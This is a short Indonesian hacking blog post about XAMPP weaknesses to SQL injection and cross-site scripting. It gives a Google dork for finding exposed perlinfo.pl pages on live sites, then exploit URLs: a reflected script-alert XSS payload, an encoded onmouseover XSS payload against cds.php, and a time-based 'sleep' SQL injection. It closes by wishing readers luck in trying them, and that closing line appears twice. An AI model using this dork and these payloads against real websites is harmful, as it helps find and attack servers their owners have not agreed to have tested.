Kembali lagi, lama Admin Hoedhya Corp tidak memposting di Blog ini. Kali ini saya akan sedikit share tentang salah satu aplikasi server yaitu XAMPP.
Yang akan saya bahas disini yaitu Kerentanan XAMPP terhadap SQL Injection dan Cross Site Scripting (XSS). Untuk versi dari XAMPP yang digunakan silahkan di explorer lagi ya ...
Tidak perlu panjang lebar untuk menjelaskannya. Langsung ke targetnya aja ya, Sobat. ^_^
Bahan - bahan :
- Koneksi internetDork :
- Makanan ringan untuk menemani ke Jonesan, Sobat senditi (Hehehe)
- Berdoa
inurl:/perlinfo.pl/ (Bisa dikembangkan lagi)Exploit :
- http://website/.(patch)./perlinfo.pl/"<script>alert("Hoedhya Corp")</script>Example :
- http://website/.(patch)./cds.php/%27onmouseover=alert%28%22Hoedhya Corp%22%29%3 => Masih Tidak Tetap Untuk Version 1.7.4
- http://website/.(patch)./cds.php?interpret=1&jahr=1967 and sleep(1) &title=555-666-0606
Gimana ? Mungkin itu saja yang bisa saya share kali ini. Dan tunggu postingan saya selanjutnya ya ...
Semoga dengan adanya artikel ini dapat digunakan pembelajaran dan referensi. Semoga bermanfaat dan selamat mencoba ... ^_^
Semoga dengan adanya artikel ini dapat digunakan pembelajaran dan referensi. Semoga bermanfaat dan selamat mencoba ... ^_^